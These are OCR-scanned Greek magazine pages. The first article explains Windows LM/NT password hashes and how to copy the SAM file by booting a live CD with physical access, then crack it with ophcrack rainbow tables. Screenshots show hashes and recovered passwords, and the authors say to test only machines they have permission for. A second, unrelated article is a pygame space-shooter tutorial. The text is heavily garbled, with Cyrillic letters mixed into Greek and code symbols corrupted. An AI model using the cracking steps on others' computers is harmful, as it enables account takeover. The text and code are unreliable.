τμήματα, τα onoia εἶναι ευκολότερο να “σπάσουν”. 


Та NT hashes ὁμως xouv κι αυτά ἑνα σημαντικὀ μειονέκτημα, αφού για 
τη δηµιουργία τους επἰσης δεν γίνεται salting. Κι αν тора αναρωτιέστε τι 
εἶναι αυτό το алатора που έχουμε ἠδη αναφέρει αλλά χωρίς να δώσου- 
НЕ εξηγήσεις, σας ЛЕНЕ от! проката! για ша απλἠ αλλά ἐξυπνη τεχνική, 
ката την οποία παράγεται ἑνας τυχαὶος αριθµός που συμμετέχει κι αυτός 
στον υπολογισμό του hash. Av λοιπὀν χρησιμοποιούταν то за тд, το ἴδιο 
plaintext password θα μπορούσε να έχει διαφορετικά hashes και η δημι- 
oupyia rainbow tables yia την αντιστροφἠ NT hashes да ἦταν προφανώς 
αδύνατη. Επειδἠ ӧрос̧ то salting δεν Χρησιμοποιείται, т=Лка Екі Έξω 
(TM) κυκλοφορούν rainbow tables τόσο για LM, ὁσο και yia NT hashes. 
Βεβαίως, ra tables yia τα τελευταία τείνουν να μεγαλώνουν πολύ πιο 
γρήγορα σε σχέση µε ra tables yia ra LM hashes, το θέμα ὁμως εἶναι ότι 
υπάρχουν και μάλιστα ορισμένα διατίθενται δωρεάν! 


Πού αποθηκεύουν τα Windows τα hashes; 


Ανεξαρτήτως αν μιλάμε για та XP ἡ ra 7, ra LM ἡ МТ hashes αποθηκεύο- 
ута! σ’ ἑνα registry file ονόματι SAM (£k rou Security Accounts Manager). 
Ουσιαστικἀ, проката! για µια μικρἠ βάση δεδοµένων στην οποία ou- 
γκεντρώνονται та password hashes των χρηστῶν του συστήματος. To 
αρχείο SAM κατοικεὶ κάτω апо τον κατάλογο \Windows\system32\config 
και η προσπἐλασἠ rou *uerà* την εκκἰνηση του λειτουργικού δεν εἰναι 
δυνατή. 


Προφανώς, yia va ἐχουμε µια πιθανότητα у’ αποκαλύψουμε τον κωδικὀ 
ενὸς χρήστη, χρειαζόμαστε прота ап’ ола αυτὀ το αρχείο SAM. О ευκο- 
λότερος τρόπος για va το αποκτήσουμε εἶναι όταν έχουμε Φυσική πρὀ- 
σβαση στον υπολογιστή-στόχο, TOV οποίο και ξεκινάμε ἡ επανεκκινούµε 
Φορτώνοντας £va ἄλλο λειτουργικὀ, π.χ., апо ἑνα CD ἡ USB stick. Ὅλοι 
καταλαβαίνουμετι σημαίνει αυτό στην πράξη: Апо ro CD ἡ то USB bootà- 
ρει κάποια διανομὴ Linux, αφού φορτώσει προσαρτούµε το διαμέρισμα 
των Windows που µας ενδιαφέρει, μετὰ αντιγράφουµε κάπου το αρχείο 
SAM (п.Х., с’ èva USB stick ἡ δικτυακὰἁ o’ ἑναν άλλον υπολογιστή) κι ap- 
γότερα δίνουμε ro hash ἡ ra hashes rou SAM στο κατάλληλο εργαλείο, 
προσπαθώντας έτσι να ra αντιστρέψουμε. 


Στη συνέχεια περιγράφουμε κάποιες δικὲς µας απὀπειρες ανεύρεσης KW- 
δικὠν σε δύο boxes (για την ακρίβεια Virtualbox VMs), το ¿va µε Windows 
ХР SP3 ка! το ἄλλο µε Windows 7 $Р1. 


Καλωσορίστε то ophcrack! 


To δωρεὰν εργαλείο ophcrack (http://ophcrack.sourceforge.net) χρησι- 
µοποιεἰ rainbow tables προκειµένου va “&=ок=пася!” ra LM ἡ NT hashes 
των αρχείων SAM. Υπάρχουν δύο ЕКбОХЁС rou ophcrack: Mia nou εγκα- 
θίσταται πάνω στο λειτουργικὀ του στὀχου και μία αυτόνομη nou τρέχει 
апо Linux live CD, το οποίο φορτώνει στο Ρ6-στὀχο κι аоторатопогі то 
σπάσιμο των passwords όλων των χρηστών. (Н διανομὴ Linux του CD 
εἶναι το SliTaz, www.slitaz.org.) 


Προφανώς, η εκδοχἡ nou εγκαθἰσταται πάνω апо τα Windows εἶναι ό,τι 
πρέπει για εκπαιδευτικούς λόγους, για επιδείξεις ἡ ακὀµη και για ἑναν 


Та passwords των Windows, αλλά στη φόρα! 
ПИ 


Windows ХР [Running] 


ΠΠΤΗ 
not found 


[Administrator Я858ссс134508927415615<7062с35е — &fBaBbfeSadedSd4Scbed0277de1b630 5080123 
Guest э186сїе08 168е93173с5907е0‹0890 

"disabled" Helpssistant. 088ca74492c4e575d8fe3865e09234 850853060а0354926032с73е9552206 not found 
"deabled* SUPPORT, 38894520 d8971d3f6012f156f6422990 17367050 
<3<80е940884861545есед6в00141 


empty 
Τ2ΟΜΦΕ not found 
not found 


fS3628fbba 7ddceeSfe S 14da6024d408 not found 


Ej XP free fast — CiDocuments and Settings/Al Users/Documents/tables, xp. free fast 75% п RAM 
9 tableo опа 
Ф tablei 100% in RAM 


Ф е2 100% n RAM 
300% in RAM 


НЕВЫ 


Тае elapsed: | — 0h21m 165 


Windows XP [Running] 


ff8S9ccc 1340084274106 15cf062c35e Επ σσ] 
Guest 3idécfeDd 1526531573c59d7e0c089c0. empty 

"dsabled" HeipAssistant 09aca734492c4e576d8f3865e809234  850893d6ba03548926b33c73e9552206 not found 22040Е not found. 
"disabled" SUPPORT. 38894580 195971930901215е422990173е7050 not found. 
|subzraw. 649864<е05ва2е2054006548с29036 405127е0098264ее7с545с70803500 


68% In RAM 
36% in RAM 


Ej Ф XP free fast CiDocuments and Settings/AI Users/Documents tables yp. free fast 
9 tableo 


τ 

[ 
Ф tabiel 100% пам В 
9 table2 369ΒΑΜ 8 
9 tables 100% пАМ — f 


[BOES езы 
SOL POO sies 


Διπλή αποτυχία για ro ophcrack! Πλέον το urxávnua-oróxoc τρέχει Windows XP ki o λογαριασμός που 
θέλουμε va «&&okenácoupe» εἰναι εκείνος rou χρήστη subZraw. Παρατηρήστε от! επειδή та LM hashes 
των ΧΡ αποτελούνται апо δύο µέρη, ro ophcrack εἶναι εὐκολο va τους επιτεθεί και πράγματι σημειώνει 
επιτυχίες -- χωρίς όμως να καταφέρει ка! у’ αποκαλύψει ολόκληρα та passwords 
(aw3s0m3mag@zin και ј@һппус@93! αντίστοιχα). 


21 


WV'HAGIKER 


ÁN 


επιτιθἐµενο µε φυσικἠ πρόσβαση στο PC-oTòxo αλλά к! αρκετό χρόνο 
στη διἀθεσή του! 


Н εκδοχἠ του ophcrack που τρέχει αυτοματοποιημένα апо το live CD 
έρχεται σε δύο εκδόσεις: Mia για Windows ХР και µία yia Vista/7. Про- 
ката! για δύο ξεχωριστά ISO files κι αφού κατεβάσουμε αυτό nou µας 
ενδιαφἑρει το γράφουμε πάνω о’ va ἄδειο δισκάκι CD, καταφεύγοντας 
σε ἑνα εργαλείο σαν το δωρεάν ImgBurn (www.imgburn.com). Ακολούθως 
πηγαίνουμε μπροστὰ апо τον υπολογιστἠ-στὀχο και TOV επανεκκινούμε 
ἡ τον ξεκινάμε -- σε kåbe περίπτωση апо то CD µε ro ophcrack. Προσο- 
χἠ: Πα να ξεκινήσει η ακολουθἰα εκκίνησης του υπολογιστή ψάχνοντας 
*прота* τον οδηγὀ CD/DVD για boot code, ενδεχομένως να χρειαστεί 
κατάλληλη ρύθμιση στο BIOS. 


Μόλις φορτώσει το SliTaz Linux (το λειτουργικό πάνω στο CD), το ophcrack 
θα ξεκινήσει αυτόματα και θα επιχειρήσει να σπάσει τα passwords όλων 
των χρηστῶν του λειτουργικού-στόχου. Та ὁποια θετικἀ ἡ аруптіка апо- 
τελέσμµατα απεικονίζονται στην οθὀνη. 


Γενικά, ката τη διάρκεια των δικὠν µας δοκιμών ορισμένα passwords που 
φαίνονταν δύσκολα ro ophcrack τα έβρισκε σε λιγότερο апо ἑνα λεπτὸ, 
σε άλλες περιπτώσεις χρειαζόταν δύο με τρία λεπτά, evo υπήρχαν κι εκεἰ- 
νες που δεν έβρισκε ακόµα και φαινομενικά εὐκολα passwords. 


Στην περίπτωση rov Windows ΧΡ, κωδικοί χρηστών µε μήκος то πολύ 14 
χαρακτήρες οι οποίοι αποτελούνται μόνο апо γράμματα ἡ αριθμούς, εἶναι 
γενικἁ πανεύκολη Asia yia το ophcrack. Στα Windows 7 όµως η εικόνα εἷ- 
ναι διαφορετικἠ. Στηριζὀμενο στο ёха ка! μοναδικὀ rainbow table που о! 
δημιουργοί του ophcrack παρέχουν δωρεὰν, ro проуранна βρίσκει μόνο 
“sikoa” passwords, δηλαδή εκείνα µε μήκος ох! πάνω апо окто xapa- 
κτήρες και που αποτελούν µια συνηθισμένη λέξη της αγγλικής. 

To tOtalpasswd123 

σας φαίνεται калб Κάντε τις δικές σας δοκιμές µε το ophcrack και δείτε πόσο ισχυρό εἶναι το 

password ἡ ὀχι; password nou ἐχετε. Έχετε υπόψη ὁτι οι δημιουργοί του προγράµµατος 

То ophcrack yra παρέχουν προς πώληση τεράστια rainbow tables, yia Windows XP, Vista 

Windows XP па- А А А 

ντως то ξεσκέπα- ка! 7. Αν Aoinóv το ophcrack δεν βρει τον κωδικὀ σας στηριζὀµενο στα 

σε ;) δωρεὰν rainbow tables, µην υποθέτετε αυτόματα ὁτι εἶναι ισχυρὸς! 


Σε γενικὲς γραμμές, χρησιμοποεἰτε 
passwords µε περισσότερους απὀ 
14 χαρακτήρες, τα οποία συνδυ- 


Ie svoo a с ἆζουν πεζοκεφαλαία, αριθµητικἁ 
(554 Delete me, Tables stop нер Ext About ψηφία, σύμβολα ка! *ógv* проёр- 
| [ Prooress το Preferences ] χονται апо λέξεις που συναντάμε 


LM Hash 
#859ссс13460842.., 


στα συνήθη λεξικἀ. 


User 
Administrator 
Guest 


empty 
220 ν Στις εικὀνες του άρθρου φαίνονται 
tOtalpasswd123 


SS στιγμιότυπα anó τους δικούς µας 
πειραματισμούς, ενώ οι αντίστοι- 
χες περιγραφές συνήθως xouv 
кат! χρήσιμο να πουν. Δείτε, δια- 
βάστε και ξεκινήστε αμέσως τις δο- 
κιμές, στον OIKÓ σας υπολογιστή ἡ 
o’ εκεἰνους φίλων. 


*disabled* HelpAssistant 09аса734492с4е5.., 
disabled SUPPORT, 3... 7 
subZraw 5f7eB4f4blabaa08.., 6641511505561... 


Table. Directory. Status 
5 @ XP fre.. J/|media/hdc., 100% in RAM 


Progress 


Preloadi — done — Ве ее 4 вый 25 — ] rimeelspsedi[ пела | A, αφού τους ενημερώσετε Kai πά- 
: ρετε την ἁδειά τους, φυσικὰ ;) 


Та passwords των Windows, αλλά στη φόρα! 
ML 


2015 
эса (0 о а € 
load „Delete вме Tabs нер Exit About 
Progress | Statistics | Preferences | 
User "t LM Hash. NT Hash. 1МмРуй 1 1мРиа 2 NT Pwd 
аттаган озона — FR feiriedNcbe DIT ee 5000123 CL mL 
Guest 3idécfe0d 168e931b73c59d7e0c089c0. empty 
"disabled" HelpAssistant. `03аса734492с4е576481а3855ег09234 8508930680354а92633с73е9552206 not found 220466 not found. 
“disabled” SUPPORT, 38894540. 4897143940 12f15efb422990173e7050. not found 
eder ο ο “ο и Ва н A 
Evo προηγουμένως то ophcrack 
δεν βρήκε то aw3s0m3mag (9 
zin, τώρα εντόπισε TO 
aw3s0m3magazin. Та δύο 
Table Directory. Status. Progress. 5 Не 
5 ® XP free fa с nts and Settings/All Users /Docur ‚вез xp free fa 75% п RAM ЕЧ] 
веря степів and Settings/Al Users Documents tables xp. free fast ne passwords διαφέρουν ката εναν 
9 tabel 100% м ВАМ Ш 3 3 
He 1000 АМ ——————— — —] нохо χαρακτηρα. 
© tables 100%inRAM ПИ 
Preload: done Brute force; done Pwd found: 2/5 Time elapsed: Oh 18m 135 


‚ using 4 

‚ using 4 
ing 4; 

, using 4 
‚ using 4; 

4 

1 

1 


ing 
ing 


To ophcrack τρέχει απὀ ro live CD 
και συγκεκριμένα σε text mode. 
Μόλις ανακάλυψε το password 
του χρήστη subZraw. 


Pre EN ἢ to c 


T егіоб. Some p 
rogram might be 


lol x| 
ΠΕΣ. 
μ Ὦ ων 5 е 
Load , Delete зе. 15 Crack Help Ext About 
Progress | Statistics | Preferences | 
User τι 1M Hah | NT Hash MPwd 1 wewé2 | NT Pwd 
Administrator TfSSSccc134b0802741615cf062:35e  — BfeSbfeGededSd4Scbed0277de1b640 5080125 not found not found 
|Guest 31d6cfe0d 162931b73c59d7e0c089c0 empty 
"disabled" HepAssistant 093c8734492c4e576d8fe3865e209234  850893d603548926b33:73e9552206 not found 220)40€ not found 
"disabled" SUPPORT. 38894520 d8971d3fd0 12f1 5efb42990173e7050 not found и 
адам ca49bd4186edb88c781e2742178fecd4 ^ db4200020e8275c7a656b246a8e04fa3 — 4J2FHKS SDBO2GY jafhiasdbo2gy 
таре Directory Status Progress. 
2 ә Р free fast |CuDocuments and Settings/AI Users/Documents/tables. xp. free. fast 58% in RAM 
Ф tableo 36% in RAM 
9 tabiel 100% in RAM 
Ф table2 36% in RAM 
9 tables 100% in RAM Е UE] 
Preload: done Brute force: | done | Рабле: | z5 — — Time elapsed: Oh 2m 33s | 


То 4j2fhk9sdbo2gy μοιάζει σίγουρα ισχυρό yia password: δεν βασίζεται σε καμία λέξη апо λεξικό puol- 

κής γλώσσας, αποτελείται апо γράμματα και ψηφία, δεν εἶναι σύντομο κι επιπρόσθετα μοιάζει να εἶναι 

εντελώς τυχαίο. О χρήστης που το επινόησε πρέπει va εἰναι uber geek, yia va το θυμάται! Κι όμως, то 
ophcrack ro ξεσκέπασε µε χαρακτηριστική ευκολία :5 


Sk111: 
Intermediate 


Tags: pygame, 
scrolling 
background, 
laser shots, 
sound effects 


Python Game Programming: 


Ready, set, fire! 


z Μέχρι στιγµἠς έχουμε ασχοληθεί µε ra βασικά του 
| παιχνιδιού µας. Δημιουργήσαμε τις κλάσεις για το σκάφος 
μας και τους εξωγήινους, п=ТОХанЕ την κίνηση µε ra 
βελάκια και προσθέσαµε µουσικἠ. Όμως το Рудате 
Invaders ἐχει πολύ δρόμο μπροστὰ του, για να γίνει ӧпос̧ 
TO φανταζόμαστε! Х=ра £youv το κυλιόμενο φόντο, οι 
і Вол с̧ ка! τα ох=тка пҳптіка εφέ... 


-— - σπ' 
-— = = m ΓΈ 
Ll = = =. 
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Στο άρθρο rou deltaHacker 009 ξεκινήσαμε να γράφουμε то ὀνειρο κάθε 
"bedroom programmer" των 80's: Ένα γρήγορο space shooter! Εκείνη 
την &ПОХИ η λέξη “γρήγορο” σήμαινε от! θα χρησιμοποιούσαμε assembly 
ἡ от! растау τυχεροί και διαθέταμε μηχάνημα µε hardware sprites, Ka- 
θώς και µια γλὠσσα σαν την extended BASIC rou ΤΙ-99 ἡ του Commodore 
64. Oi υπόλοιποι προγραμματιστές, οι οποίοι έγραφαν σε απλἠ BASIC, 
περιορίζονταν στην κίνηση μόνο μερικὠν χαρακτήρων. Ἔτσι, το Space 
Invaders κατέληγε γρήγορα σε Space Invader, αφού η κίνηση ενὸς μόνο 
εξωγήινου σκάφους, μαζὶ µε την κίνηση του δικού µας και τη σχεδίαση 
των βολών, εξαντλούσαν τις δυνατότητες της γλὠσσας проуранрат!- 
σμού. Κι όλα αυτά χωρίς να ἐχουμε ασχοληθεἰ καθόλου pe ra ηχητικά εφὲ 
και την ανίχνευση συγκρούσεων... 


Ευτυχώς για 'μάς, σήμερα ох! µόνο ἐχουμε ταχύτερα μηχανήματα αλλά 
διαθέτουμε και (τουλάχιστον) ша γλὠσσα προγραμματισμού η οποία 
υλοποιεί εὐκολα και καθαρὰ οτιδήποτε θέλουμε. Μέχρι στιγμής, λοιπὀν, 
έχουμε ασχοληθεἰ µε та ακόλουθα στοιχεία του παιχνιδιού µας: 


ο Графарғ τις βασικὲς κλάσεις για το διαστημόπλοιο και τους εξω- 
γήινους 
ο Υλοποιήσαμε την κἰνηση του δικού µας σκάφους µε τα βελάκια 
ο Φτιάξαμε µια απλἠ/βασικἡ κλάση για то фоуто 
ο Προσθέσαμε ἠχο και µουσική στη βασικἠ τους μορφή 
Ἐχοντας φορτίσειτις προγραμματιστικὲς µας μπαταρίες (και ὀχι, ora 80's 
δεν συνηθἰζαμε τις πἰτσες και τις κὀλες γι’ αυτό το σκοπὀ) αισθανόμαστε 


ἑτοιμοι να αντιμετωπίσουμε τις επὀµενες προκλήσεις yia την κατασκευἠ 
του Рудате Invaders. 


Κυλιόμενο φόντο 


Н κύλιση µιας εικόνας στο υπόβαθρο του παιχνιδιού αποτελούσε απἰστευ- 
τη πρὀκληση στα 80's. Πλέον, τα πράγματα εἶναι πολύ πιο εὐκολα. Όμως 
пос да δημιουργήσουμε µια κυλιόμενη εικόνα апо µια στατικἠ, όταν ра- 
λιστα το μέγεθος της στατικἠς εἶναι ioo µε αυτό του παραθύρου µας; 


Поло апла, φανταστείτε от! παίρνετε την εικόνα του фоутоц και σε κάθε 
карё τη μετατοπἰζετε προς τα κάτω -pE µια συγκεκριμένη ταχύτητα φυ- 
отка. Έχοντας ката vou aurr| την απλἠ εκδοχἠ μπορούμε να συμπληρά- 
coupe τη συνάρτηση Scroll, στην οποία εἰχαμε γράψει µόνο ἑνα απλὀ 
pass: 
def Scroll(self, speed y, time): 

distance y - speed y * time 

self.coord[1] += distance y 
Тара, πρέπει va βρούμε τη γραµµή StarField.Show(screen) στον κύριο 
βρόχο του προγράμματος και va προσθέσουµε апо πάνω της την akò- 
λουθη: 


StarField.Scroll(backspeed, time) 


Φυσικά, θα πρέπει va ἐχουμε ορἰσει κάπου την επιθυμητή ταχύτητα 
(backspeed). Αυτό μπορεἰ να γίνει οπουδήποτε ἐξω апо ro βρὀχο while 
του παιχνιδιού рас: 


# Set the background scrolling speed 


Python Game Programming: Ready, set, fire! 
ПИ 


backspeed = 100 


AuTO ἠταν! Тора μπορούμε va τρἐξουµε το паҳуіёі και va γνωριστούμε 
НЕ TO... 


...Руїћоп debugging! 


Ὅπως ἑχουμε πει σε προηγούμενα άρθρα, yia να πετύχουμε το επιθυμητό 
αποτέλεσµα δεν αρκούν µερικὲς τροποποιήσεις ка! προσθήκες στον KW- 
ока µας. Πρέπει va εἰμαστε σε θέση va εντοπἱζουμε ка! να διορθώνουµε 
τα προβλήματα του! Δεν υπάρχει κὠδικας ο οποίος να γράφτηκε *xopic* 
λάθη µε τη *nporn* προσπάθεια. 


Αν δοκιμάσετε va τρέξετε το πρόγραµµα µε τις προσθήκες nou περιγρά- 
yape παραπάνω, θα δείτε кат! τέτοιο: 


Traceback (most recent call last): 


File "pygame-invaders.py", line 126, in «module» 


StarField.Scroll(backspeed, time) 
File "pygame-invaders.py", line 58, in Scroll 
self.coord[1] += distance y 
TypeError: 'tuple' object does not support item assignment 


Αναρωτιέστε τι συνέβη; Με λίγα λόγια, προσπαθήσαμε να αλλάξουμε τις 
συντεταγμένες του SpaceBackground (self.coord), τις οποίες εἶχαμε opi- 
σει σαν tuple. Ὅμως σε αντίθεση us ric λίστες, τα tuples δεν μεταβάλλο- 
vrai ποτὲ (η Python τα ονομάζει immutable objects). Έτσι, η тропопощ- 
ση των συντεταγμένων της εικόνας του φόντου δεν επιτρέπεται. Па va 
λύσουμε auro ro πρὀβλημα θα opicouus ric συντεταγμένες του ως λίστα 
και ὀχι ως tuple. Па то σκοπὀ αυτό, βρείτε την ακὀλουθη γραμμή 


StarField = SpaceBackground((0,0), "stars.jpg") 
...KI αλλἀξτε τη σε: 
StarField = SpaceBackground([0,0], "stars.jpg") 


Αλλάζονταςτις παρενθέσεις σε αγκύλες, μετατρέψαμε ro tuple σε Ліста! 
Тара μπορούμε να τρἐξουµε το πρόγραμμα ξανὰ. 


Δεύτερη απὀπειρα | 


Μη φωνάξετε «хала», μόλις δείτε то αποτέλε- 
opa! Περιμένατε Ori το φόντο θα επαναλαμβα- 
νόταν ως δια μαγείας; Σε αυτή την εκδοχἠ του 
προγράμματος п εικὀνα ρολλὰρει και, 
τελικά, εξαφανἰζεται στο κάτω μέρος 
του παραθύρου. Επἰσης, то роуаҳіко 
αστερἀκι στην ἄκρη της εικὀνας αφήνει 
µια (ακόµα πιο) ενοχλητική γραμμὴ, για 
να µην πούμε от! отау εξαφανιστεἰ то 
φόντο η κίνηση του διαστημοπλοίου Ka- 
ταστρέφεται. Αυτό το τελευταίο συμβαίνει 
γιατί κάθε φορὰ που εμφανίζεται η εικόνα του 
φόντου, σβήνει το προηγούμενο καρὲ της κίνησης του σκάφους 

μας. Χωρὶς την εικόνα φόντου, λοιπόν, όταν μετακινείται το σκάφος µας 
προβάλλονται ола τα kap£ της кімпойс̧ rou! 
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Τα προβλήματα μοιάζουν πολλά, αλλά δεν да δυσκολευτούμε va та avri- 
μετωπἰσουμε. Τι χρειαζόμαστε για το κυλιόμενο φόντο; Μια µακρόστενη 
εικόνα, ἑνα «ρολό» µε αστέρια. Па να πετύχουμε κάτι τέτοιο, μπορούμε 
να «κολλήσουμε» δύο αντίγραφα της εικὀνας φόντου, ro ἑνα πάνω anó 
το ἄλλο... 


ο Н πρώτη εικὀνα απεικονίζεται στο [0,0] και η δεύτερη ακριβώς 
πάνω anó αυτή. Н δεύτερη, δηλαδή, θα τελειώνει στο [0,0] και 
αρχικἁ θα εἶναι αόρατη (θα βρίσκεται =ктос του παραθύρου). 


ο Н κἰνηση θα πραγματοποιείται ταυτόχρονα και για τις δύο εικόνες, 
προς τα като. 


ο Όταν η πρώτη εικὀνα «βγει» anó το κἀτω акро του παραθύρου, n 
δεύτερη εικὀνα да εµφανίζεται πλήρως στο παράθυρο рас. 

ο Н διαδικασἰα επαναλαμβάνεται апо την αρχἠ και κανεἰς δεν KaTa- 
λαβαίνει от! εἶναι то ἴδιο φόντο ;) 


Ας δούμε тора τις επεμβάσεις και τις προσθἠκες που πρέπει να γίνουν 
στην κλάση yia το background, για να πετύχουμε Оба περιγράψαμε na- 
ραπάνω: 


class SpaceBackground: 
def init (self, coord, coord2, imagefile): 

Όπως βλέπετε προσθἑσαµε τη Ліста coord2, η οποία θα περιἐχει τις 
συντεταγμένες της δεύτερης εικὀνας. Αρχικά η συγκεκριμένη Ліста θα 
παίρνει την τιμή [0, -screenheight] (η εικὀνα θα βρἰσκεται =ктос rou na- 
ραθύρου). 

self.shape = pygame.image.load(imagefile) 

self.coord - coord 

self.coord2 - coord2 

self.y original - coord[1] 

self.y2 original - coord2[1] 


Οι αρχικὲς συντεταγμένες για τις δύο εικὀνες αποθηκεύονται στις λίστες 
self.coord και self.coord2. Σε αυτὲς οι συντεταγμένες θα επιστρέφουµε 
αρκετά συχνὰ και то yiari θα το φανερώσουμε στη συνέχεια. 


def Show(self, surface): 
surface.blit(self.shape, self.coord) 
surface.blit(self.shape, self.coord2) 


Προσθέσαµε ακόµα ша γραμμὴ nou κάνει blit και την δεύτερη εικόνα. 
Τίποτα το ιδιαίτερο. 


def Scroll(self, speed y, time): 
distance y - speed y * time 
self.coord[1] += distance y 
self.coord2[1] += distance y 


Παρόμοια, εδώ προσθέσαµε ша γραμμὴ yia να κινείται και η δεύτερη El- 
κόνα. Το μεγάλο κόλπο όμως βρίσκεται εδώ: 


if self.coord2[1] >= е: 


self.coord[1] = self.y original 


Python Game Programming: Ready, set, fire! 
| 


self.coord2[1] = self.y2 original 


Μόλις εμφανιστεί πλήρως η δεύτερη εικόνα (όταν η πρώτη εικόνα βγει 
апо то κάτω акро του παραθύρου), οι δύο εικὀνες επανέρχονται στις 
αρχικές τους θέσεις. Με αυτὀν rov τρόπο έχουμε και πάλι µια εικόνα μέσα 
στο παρἀθυρὀὸ µας και µία ακόµα απὀ πάνω, η onoia θα εισέρχεται στο 
παράθυρο καθὼς η πρώτη да εξέρχεται. Αν αυτὸ δεν εἶναι καμπύλωση 


του χωροχρόνου, δεν ξέρω ти εἰναι. 
ТрёнЕ Αϊνστάιν! Στο κύριο πρὀ- 
уранна, η δηµιουργία του αντικει- 
μένου για το φόντο γίνεται πλέον 
НЕ τον εξὴς τρόπο: 


StarField = 
брасеВасквгоипа( [9,0], [0, 
-screenheight], "stars.jpg") 


Fire those Lasers! 


'Exovrag τελειώσει επιτέλους µε ТО 
φόντο ἠρθε η opa να διαλύσουμε 
τους εξωγήινους µε το Laser. To 
γεγονὸς от! το παιχνίδι µας δεν δεἰ- 
χνει ακόμα εξωγήινους, апотЕлЕ! 
ша μικρὴ ενοχλητικἠ λεπτομέρεια. 
Τι θέλατε, δηλαδή; Να φτιάξουμε 
прота τους εξωγήινους και να µην 
έχουµε ὁπλα; Oa φεύγατε yia по- 
Леро χωρὶς δοκιµαστικὲἐς βολὲς και 
εκπαἰδευση; Δεν νομἰζουµε! Тора 
που λογικευτήκατε, ас δούμε τι θα 
Πρέπει να περιἐχει µια κλάση για 
τις βολές Laser: 


ο Έναν constructor, o οποίος 
θα ορἰζει μερικὲς βασικὲς 
παραμέτρους: Αρχικές ou- 
ντεταγμένες, χρώμα, μῆκος 
της γραμμής, ταχύτητα к.а. 


ο Mia µἐθοδο Show, για να £p- 
φανιστεὶ η βολὴ στην =пфа- 
уға της επιλογἠς рас. 


ο Mia μέθοδο Move, για την Ki- 
νηση της βολἠς. 


Αρχικἀ, τα παραπάνω ενδέχεται να 
σας φαΐνονται αρκετά. Επιτρέψτε 
µας va σας ρωτήσουμε, όμως: Πότε 
εξαφανίζεται ша βολή; Κάτι τέτοιο 
συμβαίνει σε δύο περιπτώσεις: 


1. ‘Отау χτυπήσει τον =парато 
εχθρὀ 

2. Ὅταν βγει £&o апо την οθὀ- 
νη 


rar ar ar ar ШР ШР ШР ШР ar ar ΠΛ... 


7 
4 
A 
4 
4 
A 
4 


ъч 
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Εικόνα 1 

To μηχάνημα εἰναι ο γνωστός Commodore 64, о urioAo- 
γιστής µε τις περισσότερες πωλήσεις όλων των εποχών! 

Αν νομίζετε όμως от! το joystick που φαίνεται προορίζεται 
να συνδεθεί πάνω του, κάνετε λάθος! Δεν εἰναι éva απλὀ 
joystick, αλλά το C64DTV: Περιέχει µἐσα του ἑναν ολό- 
κληρο C64 (χωρίς ro πληκτρολόγιο) και κάμποσα παιχνίδια 
(апд аита που φορτώναμε τότε µε τις ώρες) σε ша ROM. 
Λειτουργεί µε ипатар!Ес και συνδέεται απευθείας στην τηλε- 
όραση σας. Ναι, όλος o C64 µε σηµερινή τεχνολογία χωρόει 
σε δύο τσιπάκια στο ката μέρος ενός joystick! Εκπληκτικὀ, 
αν κι εμείς προτιμάμε τη μαγεία της πρωτότυπης παιχνιδο- 
μηχανής. Στην πάνω &ikóva φαίνεται το διάσημο παιχνίδι 
Mission Impossible του C64, απὀ το C64DTV. 


Εικόνα 2 

Μην αφήσετε κα- 
véva προγραμματι- 
στή να σας πείσει 
ότι ο κώδικας του 
εἶναι τέλειος -- ἡ 
ακόµα χειρότερα 
ότι δουλεύει µε την 
πρώτη. Στα αριστε- 
ра ξεμείναμε απὀ 
фоуто, καθώς та 
αστἑρια κύλησαν 
κάτω апд την οθό- 
νη πριν γράψουμε 
τη ρουτίνα που 
κάνει την εικόνα 
ρολό. Στα δεξιά, то 
διαστημόπλοιο µας 
ρίχνει ВОЛЕС συνε- 
χόμενα! Η αρχική 
μας σχεδίαση &ХЕ 
κάποια, Хи, шкро- 
προβλήματα... 
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Па την opa δεν έχουμε εχθρούς, αλλά πρέπει να κάνουμε κάτι για τη 
δεύτερη περίπτωση. Επομένως, η κλάση για τις βολὲς Laser πρέπει va 
περιλαμβάνει και µια μέθοδο η onoia θα επιστρέφει true ἡ false, ανάλογα 
НЕ то av п βολἠ βρίσκεται εντὸς ἡ =ктос της οθὀνης. Ας ξεκινήσουμε την 
προσπάθειά рас... 


Laser class 
Μπορούμε va υλοποιήσουμε την κλάση nou nepiypáuape σχετικἁ εὐκο- 
Ла. Ας εξετάσουμε τον κὠδικα που πρέπει να γράψουμε: 
class Laser: 
def | init (self, coord, color, size, speed): 
self.x1 = соога[9] 
self.y1 = coord[1] 
self.size - size 
self.color = color 
self.speed - speed 


О constructor δίνει τις архикёс συντεταγμένες (coord), το χρώμα (σε 
μορφὴ λίστας RGB), το μέγεθος (size) και την ταχύτητα κίνησης (speed). 
Οι συντεταγμένες ανατίθενται απευθείας στις χωριστὲς μεταβλητές х1 
και y1, για να TIG επεξεργαζὀµαστε εὐκολα στις υπόλοιπες συναρτήσεις. 


def Show(self, surface): 


pygame.draw.line(surface, self.color, (self.x1,self.y1),(self. 
X1,self.y1-self.size),3) 


Н συνάρτηση Show εἶναι απλἠ: 
Χρησιμοποιούμε τη draw του 
pygame για να φτιάξουμε µια 
γραμμὴ στο κατάλληλο μέγεθος 
και χρώμα. О συντεταγμένες δίνο- 
ута! µε τη μορφή δύο tuples (apyr| 
και τέλος γραμμής) και καθώς βλὲ- 
πετε TO μόνο που κάνουμε εἶναι να 
αλλάζουμε το y1 yia το κατάλληλο 
μήκος γραμμής. Το μυστηριώδες 
3 στο τέλος εἶναι το πλάτος της 
γραμμὴς (тріа pixel). Αν θέλαμε va 
εἶμαστε σωστότεροι, θα ορἱζαμε το 
πλάτος στον constructor (της vů- 
χτας rov κὠδικα τον βλέπει η μέρα 
και γελά). 


def Move(self, time): 
distance - self.speed * time 
self.y1 += distance 
Δεν νομἰζουµε ori η Move χρειάζε- 
ται ιδιαίτερη εξήγηση! 
def GoneAbove(self,y): 
if self.yl«-y: 


Python Game Programming: Ready, set, fire! 
| 


Εικόνα 3 

О πρὀγονος TOU 
προγράµµατος που 
φτιάχνουμε εδώ 
θα μπορούσε να 
εἶναι το Invaders 
που ἐγραψα το 
1986, στον TI-99. 
Βέβαια "Invaders» 
εἶναι μόνο κατ΄ 
όνομα, шас ка! 
µετά βίας έβγαζε 
έναν εξωγήινο 
κάθε фора. Κάτι 
τέτοιο όμως ἦταν 
λογικὀ: To Laser, 
το διαστημόπλοιο, 
o εξωγήινος, η 
κίνηση, ο ἠχος ка! 
το SCOre σε ἑνα σύ- 
στηµα των 3MHz, 
εἶναι апла θαύμα! 
Το παιχνίδια ἦταν 
γραμμένο σε 
BASIC, χωρίς καν 
sprites. 


return True 


